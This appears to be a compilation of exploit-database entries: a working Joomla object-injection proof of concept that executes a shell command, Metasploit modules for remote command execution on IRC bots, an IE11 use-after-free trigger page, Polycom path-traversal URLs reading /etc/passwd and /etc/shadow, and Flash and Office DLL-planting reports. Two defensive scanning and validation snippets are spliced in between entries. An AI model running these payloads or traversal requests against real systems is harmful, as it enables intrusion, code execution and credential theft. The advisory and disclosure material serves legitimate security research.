
'''
   Simple PoC for Joomla Object Injection.
   Gary @ Sec-1 ltd
   http://www.sec-1.com/
'''
 
import requests #  easy_install requests
 
def get_url(url, user_agent):
 
    headers = {
    'User-Agent': user_agent
    }
    cookies = requests.get(url,headers=headers).cookies
    for _ in range(3):
        response = requests.get(url, headers=headers,cookies=cookies)    
    return response
   
def php_str_noquotes(data):
    "Convert string to chr(xx).chr(xx) for use in php"
    encoded = ""
    for char in data:
        encoded += "chr({0}).".format(ord(char))
 
    return encoded[:-1]
 
 
def generate_payload(php_payload):
 
    php_payload = "eval({0})".format(php_str_noquotes(php_payload))
 
    terminate = '\xf0\xfd\xfd\xfd'
    exploit_template = r'''}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";'''
    injected_payload = "{};JFactory::getConfig();exit".format(php_payload)    
    exploit_template += r'''s:{0}:"{1}"'''.format(str(len(injected_payload)), injected_payload)
    exploit_template += r''';s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}''' + terminate
 
    return exploit_template
 
 
 
pl = generate_payload("system('touch /tmp/fx');")
 
print(get_url("http://172.31.6.242/", pl))
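A defender-side counterpart, added here and not part of the PoC above: a small scanner that reads raw HTTP request headers and flags the two markers this kind of payload carries, a serialized PHP object header (`O:<n>:"<Class>":<k>:{`) and bytes at or above 0xF0 such as the four-byte terminator the PoC appends. The sample requests are constructed for the example.

```python
import re

# Serialized PHP object header:  O:<len>:"<ClassName>":<nprops>:{
PHP_OBJECT_RE = re.compile(rb'O:\d+:"[A-Za-z_\\][A-Za-z0-9_\\]*":\d+:\{')

# Class names used by the PoC above; no browser puts these in a header.
SUSPICIOUS_CLASSES = (b'JDatabaseDriverMysqli', b'JDatabaseDriverMysql',
                      b'JSimplepieFactory', b'SimplePie')


def parse_request_headers(raw):
    """Split the header block of a raw HTTP/1.x request into (name, value) byte pairs.

    Values stay as bytes on purpose: the checks below look at raw bytes that a
    text decoder would reject or alter.
    """
    head = raw.split(b'\r\n\r\n', 1)[0]
    headers = []
    for line in head.split(b'\r\n')[1:]:          # [0] is the request line
        if b':' not in line:
            continue
        name, value = line.split(b':', 1)
        headers.append((name.strip().lower(), value.strip()))
    return headers


def scan_header_value(name, value):
    """Return a list of findings (strings) for one header value; empty if clean."""
    label = name.decode('latin-1')
    findings = []

    m = PHP_OBJECT_RE.search(value)
    if m:
        findings.append(f"{label}: serialized PHP object {m.group(0).decode('latin-1')!r}")

    named = [c.decode() for c in SUSPICIOUS_CLASSES if c in value]
    if named:
        findings.append(f"{label}: names Joomla/SimplePie classes {named}")

    # 0xF0-0xF4 start a 4-byte UTF-8 sequence; 0xF5-0xFF never occur in valid UTF-8.
    high = sum(1 for b in value if b >= 0xF0)
    if high:
        findings.append(f"{label}: {high} byte(s) >= 0xF0 (4-byte UTF-8 lead or invalid byte)")

    try:
        value.decode('utf-8')
    except UnicodeDecodeError:
        findings.append(f"{label}: value is not valid UTF-8")

    return findings


def scan_request(raw):
    """Scan every header of a raw request and return all findings."""
    findings = []
    for name, value in parse_request_headers(raw):
        findings.extend(scan_header_value(name, value))
    return findings


# Constructed sample requests for this example (not captured traffic).
BENIGN_REQUEST = (b'GET / HTTP/1.1\r\nHost: shop.example\r\n'
                  b'User-Agent: Mozilla/5.0 (X11; Linux x86_64) Firefox/42.0\r\n\r\n')

# Header shaped like the PoC's User-Agent: a serialized Joomla object followed by
# the same four high bytes the PoC appends as its terminator.
INJECTED_REQUEST = (b'GET / HTTP/1.1\r\nHost: shop.example\r\n'
                    b'User-Agent: }__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";'
                    b'O:17:"JSimplepieFactory":0:{}}\xf0\xfd\xfd\xfd\r\n\r\n')


if __name__ == '__main__':
    for label, req in (('benign', BENIGN_REQUEST), ('injected', INJECTED_REQUEST)):
        print(label, scan_request(req) or 'clean')
```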
            
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit4 < Msf::Exploit::Remote

  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Xdh / LinuxNet Perlbot / fBot IRC Bot Remote Code Execution',
      'Description'    => %q{
          This module allows remote command execution on an IRC Bot developed by xdh.
          This perl bot was caught by Conor Patrick with his shellshock honeypot server
          and is categorized by Markus Zanke as an fBot (Fire & Forget - DDoS Bot). Matt
          Thayer also found this script which has a description of LinuxNet perlbot.

          The bot answers only based on the servername and nickname in the IRC message
          which is configured on the perl script thus you need to be an operator on the IRC
          network to spoof it and in order to exploit this bot or have at least the same ip
          to the config.
        },
      'Author'         =>
        [
          #MalwareMustDie
          'Jay Turla', # msf
          'Conor Patrick', # initial discovery and botnet analysis for xdh
          'Matt Thayer' # initial discovery for LinuxNet perlbot
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'URL', 'https://conorpp.com/blog/a-close-look-at-an-operating-botnet/' ],
          [ 'URL', 'https://twitter.com/MrMookie/status/673389285676965889' ], # Matt's discovery
          [ 'URL', 'https://www.alienvault.com/open-threat-exchange/blog/elasticzombie-botnet-exploiting-elasticsearch-vulnerabilities' ] # details of what an fBot is
        ],
      'Platform'       => %w{ unix win },
      'Arch'           => ARCH_CMD,
      'Payload'        =>
        {
          'Space'    => 300, # According to RFC 2812, the max length message is 512, including the cr-lf
          'DisableNops' => true,
          'Compat'      =>
            {
              'PayloadType' => 'cmd'
            }
        },
      'Targets'  =>
        [
          [ 'xdh Botnet / LinuxNet perlbot', { } ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Dec 04 2015',
      'DefaultTarget'  => 0))

    register_options(
      [
        Opt::RPORT(6667),
        OptString.new('IRC_PASSWORD', [false, 'IRC Connection Password', '']),
        OptString.new('NICK', [true, 'IRC Nickname', 'msfuser']), # botnet administrator name
        OptString.new('CHANNEL', [true, 'IRC Channel', '#channel'])
      ], self.class)
  end

  def check
    connect

    res = register(sock)
    if res =~ /463/ || res =~ /464/
      vprint_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
      return Exploit::CheckCode::Unknown
    end

    res = join(sock)
    if res !~ /353/ && res !~ /366/
      vprint_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel")
      return Exploit::CheckCode::Unknown
    end

    quit(sock)
    disconnect

    if res =~ /auth/ && res =~ /logged in/
      Exploit::CheckCode::Vulnerable
    else
      Exploit::CheckCode::Safe
    end
  end

  def send_msg(sock, data)
    sock.put(data)
    data = ""
    begin
      read_data = sock.get_once(-1, 1)
      while !read_data.nil?
        data << read_data
        read_data = sock.get_once(-1, 1)
      end
    rescue ::EOFError, ::Timeout::Error, ::Errno::ETIMEDOUT => e
      elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
    end

    data
  end

  def register(sock)
    msg = ""

    if datastore['IRC_PASSWORD'] && !datastore['IRC_PASSWORD'].empty?
      msg << "PASS #{datastore['IRC_PASSWORD']}\r\n"
    end

    if datastore['NICK'].length > 9
      nick = rand_text_alpha(9)
      print_error("The nick is longer than 9 characters, using #{nick}")
    else
      nick = datastore['NICK']
    end

    msg << "NICK #{nick}\r\n"
    msg << "USER #{nick} #{Rex::Socket.source_address(rhost)} #{rhost} :#{nick}\r\n"

    send_msg(sock,msg)
  end

  def join(sock)
    join_msg = "JOIN #{datastore['CHANNEL']}\r\n"
    send_msg(sock, join_msg)
  end

  def xdh_command(sock)
    encoded = payload.encoded
    command_msg = "PRIVMSG #{datastore['CHANNEL']} :.say #{encoded}\r\n"
    send_msg(sock, command_msg)
  end

  def quit(sock)
    quit_msg = "QUIT :bye bye\r\n"
    sock.put(quit_msg)
  end

  def exploit
    connect

    print_status("#{rhost}:#{rport} - Registering with the IRC Server...")
    res = register(sock)
    if res =~ /463/ || res =~ /464/
      print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
      return
    end

    print_status("#{rhost}:#{rport} - Joining the #{datastore['CHANNEL']} channel...")
    res = join(sock)
    if res !~ /353/ && res !~ /366/
      print_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel")
      return
    end

    print_status("#{rhost}:#{rport} - Exploiting the malicious IRC bot...")
    xdh_command(sock)

    quit(sock)
    disconnect
  end

end
            
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Legend Perl IRC Bot Remote Code Execution',
      'Description'    => %q{
          This module exploits a remote command execution on the Legend Perl IRC Bot.
          This bot has been used as a payload in the Shellshock spam last October 2014.
          This particular bot has functionalities like NMAP scanning, TCP, HTTP, SQL, and
          UDP flooding, the ability to remove system logs, and ability to gain root, and
          VNC scanning.

          Kevin Stevens, a Senior Threat Researcher at Damballa, has uploaded this script
          to VirusTotal with a md5 of 11a9f1589472efa719827079c3d13f76.
        },
      'Author'         =>
        [
          'Jay Turla' # msf and initial discovery
          #MalwareMustDie
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '121681' ],
          [ 'EDB', '36836' ],
          [ 'URL', 'https://www.damballa.com/perlbotnado/' ],
          [ 'URL', 'http://www.csoonline.com/article/2839054/vulnerabilities/report-criminals-use-shellshock-against-mail-servers-to-build-botnet.html' ] # Shellshock spam October 2014 details
        ],
      'Platform'       => %w{ unix win },
      'Arch'           => ARCH_CMD,
      'Payload'        =>
        {
          'Space'    => 300, # According to RFC 2812, the max length message is 512, including the cr-lf
          'DisableNops' => true,
          'Compat'      =>
            {
              'PayloadType' => 'cmd'
            }
        },
      'Targets'  =>
        [
          [ 'Legend IRC Bot', { } ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Apr 27 2015',
      'DefaultTarget'  => 0))

    register_options(
      [
        Opt::RPORT(6667),
        OptString.new('IRC_PASSWORD', [false, 'IRC Connection Password', '']),
        OptString.new('NICK', [true, 'IRC Nickname', 'msf_user']),
        OptString.new('CHANNEL', [true, 'IRC Channel', '#channel'])
      ], self.class)
  end

  def check
    connect

    res = register(sock)
    if res =~ /463/ || res =~ /464/
      vprint_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
      return Exploit::CheckCode::Unknown
    end

    res = join(sock)
    if res !~ /353/ && res !~ /366/
      vprint_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel")
      return Exploit::CheckCode::Unknown
    end

    quit(sock)
    disconnect

    if res =~ /auth/ && res =~ /logged in/
      Exploit::CheckCode::Vulnerable
    else
      Exploit::CheckCode::Safe
    end
  end

  def send_msg(sock, data)
    sock.put(data)
    data = ""
    begin
      read_data = sock.get_once(-1, 1)
      while !read_data.nil?
        data << read_data
        read_data = sock.get_once(-1, 1)
      end
    rescue ::EOFError, ::Timeout::Error, ::Errno::ETIMEDOUT => e
      elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
    end

    data
  end

  def register(sock)
    msg = ""

    if datastore['IRC_PASSWORD'] && !datastore['IRC_PASSWORD'].empty?
      msg << "PASS #{datastore['IRC_PASSWORD']}\r\n"
    end

    if datastore['NICK'].length > 9
      nick = rand_text_alpha(9)
      print_error("The nick is longer than 9 characters, using #{nick}")
    else
      nick = datastore['NICK']
    end

    msg << "NICK #{nick}\r\n"
    msg << "USER #{nick} #{Rex::Socket.source_address(rhost)} #{rhost} :#{nick}\r\n"

    send_msg(sock,msg)
  end

  def join(sock)
    join_msg = "JOIN #{datastore['CHANNEL']}\r\n"
    send_msg(sock, join_msg)
  end

  def legend_command(sock)
    encoded = payload.encoded
    command_msg = "PRIVMSG #{datastore['CHANNEL']} :!legend #{encoded}\r\n"
    send_msg(sock, command_msg)
  end

  def quit(sock)
    quit_msg = "QUIT :bye bye\r\n"
    sock.put(quit_msg)
  end

  def exploit
    connect

    print_status("#{rhost}:#{rport} - Registering with the IRC Server...")
    res = register(sock)
    if res =~ /463/ || res =~ /464/
      print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
      return
    end

    print_status("#{rhost}:#{rport} - Joining the #{datastore['CHANNEL']} channel...")
    res = join(sock)
    if res !~ /353/ && res !~ /366/
      print_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel")
      return
    end

    print_status("#{rhost}:#{rport} - Exploiting the malicious IRC bot...")
    legend_command(sock)

    quit(sock)
    disconnect
  end

end
            
<!--
Blue Frost Security GmbH
https://www.bluefrostsecurity.de/               research(at)bluefrostsecurity.de
BFS-SA-2015-003                                                 10-December-2015
________________________________________________________________________________

Vendor:                 Microsoft, http://www.microsoft.com
Affected Products:      Internet Explorer
Affected Version:       IE 11
Vulnerability:          MSHTML!CObjectElement Use-After-Free Vulnerability
CVE ID:                 CVE-2015-6152
________________________________________________________________________________

I.   Impact

This vulnerability allows the execution of arbitrary code on vulnerable
installations of Microsoft Internet Explorer. User interaction is required to
exploit this vulnerability in that the target must visit a malicious page or
open a malicious file.

________________________________________________________________________________

II.  Vulnerability Details

Microsoft Internet Explorer 11 is prone to a use-after-free vulnerability in
the MSHTML!CTreeNode::ComputeFormatsHelper function. The analysis was performed
on Internet Explorer 11 running on Windows 7 SP1 (x64).

The following HTML page can be used to reproduce the issue:
-->

<!DOCTYPE HTML>
<html>
<meta http-equiv="X-UA-Compatible" content="IE=8" />
<style>
    small{ -ms-block-progression: lr; -ms-filter: "vv"; }
</style>
<script>
    function trigger() { document.execCommand("JustifyLeft"); }
</script>
<nolayer>blue<small>frost</small>
<applet><tt>security</applet>
<script>trigger();</script>
</html>

<!--
With page heap enabled and the Memory Protect feature turned off, visiting
that page results in the following crash:

(2d4.830): Access violation - code c0000005 (!!! second chance !!!)
eax=09b09e90 ebx=125b4e60 ecx=00000000 edx=6e9fedf0 esi=0f552fa0 edi=0f552fa0
eip=6dfcc19b esp=097fb520 ebp=097fc1f0 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
MSHTML!CTreeNode::ComputeFormatsHelper+0x53:
6dfcc19b f7402400000300  test    dword ptr [eax+24h],30000h ds:002b:09b09eb4=????????

0:007> !heap -p -a @eax
    address 09b09e90 found in
    _DPH_HEAP_ROOT @ 9b01000
    in free-ed allocation (  DPH_HEAP_BLOCK:         VirtAddr         VirtSize)
                                    9b01f04:          9b09000             2000
    748090b2 verifier!AVrfDebugPageHeapFree+0x000000c2
    77e61b1c ntdll!RtlDebugFreeHeap+0x0000002f
    77e1ae8a ntdll!RtlpFreeHeap+0x0000005d
    77dc2b65 ntdll!RtlFreeHeap+0x00000142
    758814ad kernel32!HeapFree+0x00000014
    6d92d219 MSHTML!MemoryProtection::CMemoryProtector::ProtectedFree+0x00000122
    6dc46583 MSHTML!CObjectElement::`vector deleting destructor'+0x00000023
    6dfce0db MSHTML!CElement::PrivateRelease+0x0000027e
    6d98953d MSHTML!CObjectElement::DeferredFallback+0x0000033d
    6d96e1b3 MSHTML!GlobalWndOnMethodCall+0x0000017b
    6d95577e MSHTML!GlobalWndProc+0x0000012e
    770762fa user32!InternalCallWinProc+0x00000023
    77076d3a user32!UserCallWinProcCheckWow+0x00000109
    770777c4 user32!DispatchMessageWorker+0x000003bc
    7707788a user32!DispatchMessageW+0x0000000f
    6ebfa7b8 IEFRAME!CTabWindow::_TabWindowThreadProc+0x00000464
    6ec38de8 IEFRAME!LCIETab_ThreadProc+0x000003e7
    76a9e81c iertutil!CMemBlockRegistrar::_LoadProcs+0x00000067
    747b4b01 IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x00000094
    7588336a kernel32!BaseThreadInitThunk+0x0000000e
    77dc9882 ntdll!__RtlUserThreadStart+0x00000070
    77dc9855 ntdll!_RtlUserThreadStart+0x0000001b

We can see that a freed CObjectElement object is accessed in the
MSHTML!CTreeNode::ComputeFormatsHelper function. If we take a look at the
memory just before the CObjectElement destructor is called, we can see where
the object was initially allocated.

0:007> bu MSHTML!CObjectElement::~CObjectElement
0:007> g
Breakpoint 0 hit
eax=6daf6b10 ebx=00000000 ecx=0980de90 edx=0f834bb0 esi=0980de90 edi=094bc324
eip=6dc4658f esp=094bc310 ebp=094bc318 iopl=0         nv up ei ng nz na pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000287
MSHTML!CObjectElement::~CObjectElement:
0:007> !heap -p -a poi(@esp+4)
    address 09b09e90 found in
    _DPH_HEAP_ROOT @ 9b01000
    in busy allocation (  DPH_HEAP_BLOCK:         UserAddr         UserSize -         VirtAddr         VirtSize)
                                 9b01f04:          9b09e90              170 -          9b09000             2000
          MSHTML!CObjectElement::`vftable'
    74808e89 verifier!AVrfDebugPageHeapAllocate+0x00000229
    77e6134e ntdll!RtlDebugAllocateHeap+0x00000030
    77e1b16e ntdll!RtlpAllocateHeap+0x000000c4
    77dc2fe3 ntdll!RtlAllocateHeap+0x0000023a
    6daf6a27 MSHTML!CObjectElement::CreateElement+0x00000017
    6e0423a4 MSHTML!CHtmParse::ParseBeginTag+0x000000b8
    6df17172 MSHTML!CHtmParse::ParseToken+0x00000096
    6df16a0f MSHTML!CHtmPost::ProcessTokens+0x000004c7
    6dd8341b MSHTML!CHtmPost::Exec+0x00000207
    6da308a8 MSHTML!CHtmPost::Run+0x0000003d
    6da3080e MSHTML!PostManExecute+0x00000061
    6da2727c MSHTML!PostManResume+0x0000007b
    6da971f0 MSHTML!CDwnChan::OnMethodCall+0x0000002f
    6d96e1b3 MSHTML!GlobalWndOnMethodCall+0x0000017b
    6d95577e MSHTML!GlobalWndProc+0x0000012e
    770762fa user32!InternalCallWinProc+0x00000023
    77076d3a user32!UserCallWinProcCheckWow+0x00000109
    770777c4 user32!DispatchMessageWorker+0x000003bc
    7707788a user32!DispatchMessageW+0x0000000f
    6ebfa7b8 IEFRAME!CTabWindow::_TabWindowThreadProc+0x00000464
    6ec38de8 IEFRAME!LCIETab_ThreadProc+0x000003e7
    76a9e81c iertutil!CMemBlockRegistrar::_LoadProcs+0x00000067
    747b4b01 IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x00000094
    7588336a kernel32!BaseThreadInitThunk+0x0000000e
    77dc9882 ntdll!__RtlUserThreadStart+0x00000070
    77dc9855 ntdll!_RtlUserThreadStart+0x0000001b

________________________________________________________________________________

III. Mitigation

The issue was fixed in MS15-124 which should be installed to resolve the issue.

________________________________________________________________________________

IV.  Disclosure Timeline

- 2015-08-04 Vulnerability reported to secure@microsoft.com
- 2015-09-24 Microsoft confirms that they successfully reproduced the issue
- 2015-12-08 Microsoft resolves issue in MS15-124

________________________________________________________________________________

Credit:
Bug found by Moritz Jodeit of Blue Frost Security GmbH.
________________________________________________________________________________

Unaltered electronic reproduction of this advisory is permitted. For all other
reproduction or publication, in printing or otherwise, contact
research@bluefrostsecurity.de for permission. Use of the advisory constitutes
acceptance for use in an "as is" condition. All warranties are excluded. In no
event shall Blue Frost Security be liable for any damages whatsoever including
direct, indirect, incidental, consequential, loss of business profits or
special damages, even if Blue Frost Security has been advised of the
possibility of such damages.

Copyright 2015 Blue Frost Security GmbH. All rights reserved. Terms of use apply.
-->
            
Polycom VVX-Series Business Media Phones Path Traversal Vulnerability

--Summary--

Polycom VVX-series Business Media Phones allow authenticated users to execute file path traversal attacks.

# Polycom
# http://www.polycom.com

--Affects--

# Polycom VVX 101, 201, 300, 310, 400, 410, 500, 600, & 1500
# UC Software 4.1.8 and earlier, 5.2.3 and earlier, 5.3.1 and earlier, 5.4.0 and earlier

--Details--

Polycom VVX-series IP phones provide a web administrative interface. Inside this interface we discovered two URLs that expose a "file=filename" parameter. Due to unsafe file system operations in this interface, it is possible to exploit the following pages, and possibly others, using path traversal attacks:

http://a.b.c.d/Preferences/Ringtone?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

http://a.b.c.d/Preferences/Background?file=.%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fshadow
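As an added defender-side example (not from the advisory and not Polycom's code), the Python below shows the validation a `file=` handler needs: decode the parameter fully, resolve it against the store directory and refuse any result that leaves it, checked against the advisory's two URLs plus double-encoded, absolute and NUL-byte variants. The base directory is an assumed placeholder.

```python
import posixpath
from urllib.parse import parse_qs, unquote, urlsplit

# Assumed base directory for the example; the advisory does not give the phone's real store path.
RINGTONE_DIR = '/var/app/ringtones'


def decode_param(value, max_rounds=3):
    """Percent-decode until the value stops changing, so a double-encoded
    %252e%252e%252f is seen as the ../ it becomes. Give up on pathological input."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            return decoded
        value = decoded
    raise ValueError(f'parameter is percent-encoded more than {max_rounds} times')


def resolve_file_param(file_param, base_dir=RINGTONE_DIR):
    """Return the absolute path named by file= if it lies inside base_dir, else raise ValueError."""
    base_dir = posixpath.normpath(base_dir)
    name = decode_param(file_param)
    if '\x00' in name:
        raise ValueError('NUL byte in file name')
    name = name.replace('\\', '/')                 # treat backslash as a separator too
    # Join, then collapse every '.' and '..' component. An absolute name discards base_dir
    # here, which the check below then catches.
    full = posixpath.normpath(posixpath.join(base_dir, name))
    # The only acceptable result is one whose common prefix with base_dir is base_dir itself.
    # (A plain startswith() check would accept /var/app/ringtones_evil/x.)
    if posixpath.commonpath([full, base_dir]) != base_dir or full == base_dir:
        raise ValueError(f'file parameter escapes {base_dir}: {file_param!r}')
    return full


def audit_url(url, base_dir=RINGTONE_DIR):
    """Return (allowed, detail) for the file= parameter of a request URL."""
    values = parse_qs(urlsplit(url).query, keep_blank_values=True).get('file', [])
    if len(values) != 1:
        return False, f'expected exactly one file parameter, got {len(values)}'
    try:
        return True, resolve_file_param(values[0], base_dir)
    except ValueError as exc:
        return False, str(exc)


# The two request URLs shown in the advisory.
ADVISORY_URLS = [
    'http://a.b.c.d/Preferences/Ringtone?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd',
    'http://a.b.c.d/Preferences/Background?file=.%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fshadow',
]

if __name__ == '__main__':
    for url in ADVISORY_URLS + ['http://a.b.c.d/Preferences/Ringtone?file=ring1.wav']:
        print(audit_url(url))
```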

--Mitigation--

Upgrade to the latest version of UC Software available.
Disable or restrict access to the web interface.

--Timeline--

# 6/16/2015: Notified Polycom about the issue
# 6/17/2015: Polycom responds, indicates it is investigating
# 6/18/2015: Polycom acknowledges vulnerability legitimacy
# 6/26/2015: Polycom waiting on estimate for fix from engineering
# 7/22/2015: Polycom provides projected timelines for fixes
# 11/24/2015: Polycom confirms all VVX branches are patched
# 12/9/2015: Polycom issues public vulnerability advisory

--References--

https://depthsecurity.com/blog/polycom-vvx-series-business-media-phones-path-traversal-vulnerability 

http://supportdocs.polycom.com/PolycomService/support/global/documents/support/documentation/VVX_Path_Traversals_v_1_0.pdf

Jake Reynolds
Partner/Principal Consultant
www.depthsecurity.com
            
Source: https://code.google.com/p/google-security-research/issues/detail?id=545

There is a type confusion issue during serialization if ObjectEncoding.dynamicPropertyWriter is overridden with a value that is not a function.

In the following ActionScript:

		flash.net.ObjectEncoding.dynamicPropertyWriter = new subdpw();
		var b = new ByteArray();
		var a = {};
		a.test = 1;
		b.writeObject(a);

The object 'a' with a dynamic property 'test' is serialized using a custom dynamicPropertyWriter of class subdpw. However, this class overrides writeDynamicProperties with a property that is not a function, leading to type confusion (note that the compiler will not produce this; the bytecode needs to be modified manually).

To reproduce the issue, load objectencoding.swf. PoC code is also attached. To use this code, compile the swf, and decompress it (for example, using flasm -x), and then search for the string "triteDocumentProperties" in the SWF and change it to "writeDocumentProperties".


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38970.zip
            
Source: https://code.google.com/p/google-security-research/issues/detail?id=548

If IExternalizable.readExternal is overridden with a value that is not a function, Flash assumes it is a function even though it is not one. This leads to execution of a 'method' outside of the ActionScript object's ActionScript vtable, leading to memory corruption.

A sample swf is attached. ActionScript code is also attached, but it does not compile to the needed swf. To get the PoC, decompress the swf using flasm -x myswf, and then search for "teadExternal" and change it to "readExternal".


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38969.zip
            
Source: https://code.google.com/p/google-security-research/issues/detail?id=556

It is possible for an attacker to execute a DLL planting attack in Microsoft Office 2010 on Windows 7 x86 with a specially crafted OLE object. This attack also works on Office 2013 running on Windows 7 x64. Other platforms were not tested. The attached POC document "planted-mqrt.doc" contains what was originally an embedded Packager object. The CLSID for this object was changed at offset 0x2650 to be {ecabafc9-7f19-11d2-978e-0000f8757e2a} (formatted as pack(">IHHBBBBBBBB")). This object has an InProcServer32 pointing to comsvcs.dll, specifically the CQueueAdmin object implemented in that DLL.

When a user opens this document and single-clicks on the icon for foo.txt, ole32!OleLoad is invoked on our vulnerable CLSID. This results in a call to a class factory constructor that eventually tries to call mqrt!MQGetPrivateComputerInformation. Because mqrt is a delay-loaded DLL, the loader has inserted a stub that calls _tailMerge_mqrt_dll on the first call of this function. This results in a kernelbase!LoadLibraryExA call vulnerable to DLL planting. If the attached mqrt.dll is placed in the same directory as the planted-mqrt.doc file you should see a popup coming from this DLL being loaded from the current working directory of Word.

It is worth noting that there are several other delay-loaded DLLs reachable from comsvcs.dll as well. The full list is:

ADVAPI32.dll
API_MS_WIN_Service_Management_L1_1_0.dll
API_MS_WIN_Service_Management_L2_1_0.dll
API_MS_WIN_Service_winsvc_L1_1_0.dll
API_MS_Win_Security_SDDL_L1_1_0.dll
CLBCatQ.DLL
CRYPTSP.dll
MTXCLU.DLL
ODBC32.dll
VERSION.dll
XOLEHLP.dll
colbact.DLL
dbghelp.dll
mqrt.dll
netutils.dll
samcli.dll

Here is the call stack from the delay loaded mqrt.dll:

0:000> kb
ChildEBP RetAddr  Args to Child              
001b7cb4 76f15d1c 76f30924 00000460 ffffffff ntdll!KiFastSystemCallRet
001b7cb8 76f30924 00000460 ffffffff 001b7da0 ntdll!ZwMapViewOfSection+0xc
001b7d0c 76f3099a 00000460 00000000 00000000 ntdll!LdrpMapViewOfSection+0xc7
001b7da4 76f2fec4 001b7df0 001b7f00 00000000 ntdll!LdrpFindOrMapDll+0x310
001b7f24 76f325ea 001b7f84 001b7f50 00000000 ntdll!LdrpLoadDll+0x2b6
001b7f58 75188c19 003a8aac 001b7f9c 001b7f84 ntdll!LdrLoadDll+0x92
001b7f94 751890ac 00000000 00000000 003a8aac KERNELBASE!LoadLibraryExW+0x1d9
001b7fb4 70dd96c0 70e8de20 00000000 00000000 KERNELBASE!LoadLibraryExA+0x26
001b8000 70e7cb2b 00000000 70e94148 003768a0 comsvcs!__delayLoadHelper2+0x59
001b8054 70e7588e 70ea52ec 5160c47e 8007000e comsvcs!_tailMerge_mqrt_dll+0xd
001b8088 70e75c09 069d8cf8 70dd31ac 5160c442 comsvcs!CMSMQRT::Load+0x3a
001b8090 70dd31ac 5160c442 00000000 001b8114 comsvcs!CQueueAdmin::FinalConstruct+0xa
001b80b4 70dd47ef 00000000 001b9880 069d8cf8 comsvcs!ATL::CComCreator<ATL::CComObject<CQueueAdmin> >::CreateInstance+0x50
001b80c8 70dc7d08 00000000 001b9880 001b8114 comsvcs!ATL::CComCreator2<ATL::CComCreator<ATL::CComObject<CQueueAdmin> >,ATL::CComFailCreator<-2147221232> >::CreateInstance+0x18
001b80e0 765e8c86 06988358 00000000 001b9880 comsvcs!ATL::CComClassFactory::CreateInstance+0x3b
001b8168 76603170 76706444 00000000 001b94e4 ole32!CServerContextActivator::CreateInstance+0x172 [d:\w7rtm\com\ole32\com\objact\actvator.cxx @ 1000]
001b81a8 765e8daa 001b94e4 00000000 00414230 ole32!ActivationPropertiesIn::DelegateCreateInstance+0x108 [d:\w7rtm\com\ole32\actprops\actprops.cxx @ 1917]
001b81fc 767602f1 7670646c 00000000 001b94e4 ole32!CApartmentActivator::CreateInstance+0x112 [d:\w7rtm\com\ole32\com\objact\actvator.cxx @ 2268]
001b8220 767c6311 765e8d36 001b8410 00000004 RPCRT4!Invoke+0x2a
001b8628 766fd7e6 06a70490 0678a6e8 067982b8 RPCRT4!NdrStubCall2+0x2d6
001b8670 766fd876 06a70490 067982b8 0678a6e8 ole32!CStdStubBuffer_Invoke+0xb6 [d:\w7rtm\com\rpc\ndrole\stub.cxx @ 1590]
001b86b8 766fddd0 067982b8 003a877c 00000000 ole32!SyncStubInvoke+0x3c [d:\w7rtm\com\ole32\com\dcomrem\channelb.cxx @ 1187]
001b8704 76618a43 067982b8 06979020 06a70490 ole32!StubInvoke+0xb9 [d:\w7rtm\com\ole32\com\dcomrem\channelb.cxx @ 1396]
001b87e0 76618938 0678a6e8 00000000 06a70490 ole32!CCtxComChnl::ContextInvoke+0xfa [d:\w7rtm\com\ole32\com\dcomrem\ctxchnl.cxx @ 1262]
001b87fc 766fa44c 067982b8 00000001 06a70490 ole32!MTAInvoke+0x1a [d:\w7rtm\com\ole32\com\dcomrem\callctrl.cxx @ 2105]
